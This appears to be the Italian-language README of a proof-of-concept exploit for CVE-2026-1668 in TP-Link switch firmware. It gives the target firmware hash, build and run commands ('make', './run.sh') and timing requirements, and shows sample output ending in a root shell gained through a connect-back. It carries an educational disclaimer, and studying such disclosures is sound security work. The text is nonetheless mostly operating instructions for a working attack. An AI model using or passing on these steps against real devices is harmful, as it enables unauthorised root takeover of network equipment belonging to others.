
Proof-of-concept exploit per CVE-2026-1668 nel firmware degli switch TP-Link, che distribuisce un payload MIPS in grado di fornire una shell root sui dispositivi vulnerabili.
Questo è un exploit proof-of-concept per CVE-2026-1668. È inteso puramente a scopo didattico. Si prega di non tentare di sfruttare sistemi che non si possiedono o per i quali non si ha esplicita autorizzazione all'exploit.
Questo proof-of-concept è stato sviluppato contro un'immagine firmware con il seguente hash SHA256: 4b862b8dd7fde44fa57a39b35b562f21878dd6abb8e92ccd9cdef571ed60d544.
Nomi di firmware noti per corrispondere a tale hash (non esaustivo):
Versioni firmware precedenti sono probabilmente anch'esse vulnerabili, ma potrebbero richiedere modifiche minori al payload dell'exploit.
La spiegazione di come funziona il payload è disponibile in questo post del blog.
Per compilare il payload è necessaria una toolchain GCC MIPS Linux. Su Ubuntu 24.04, è possibile installarla con sudo apt install gcc-mips-linux-gnu.
$ make
Questo exploit deve essere eseguito prima che il server HTTP abbia servito la sua prima richiesta (cioè a un avvio pulito).
$ ./run.sh
Lo script dovrebbe lasciarti in una shell di root. In caso contrario, l'exploit è fallito.
[*] Sending payload
HTTP/1.1 200 OK
Server: Web Switch
Connection: close
Content-Type: application/json
{"data":{"mByCtrl":0,"includePrivacyPolicy":0,"includeAutoCheck":1,"includeSshController":1},"errorcode":0,"success":true,"timeout":false}
[*] Connecting back to get a shell
/bin/sh: can't access tty; job control turned off
/etc #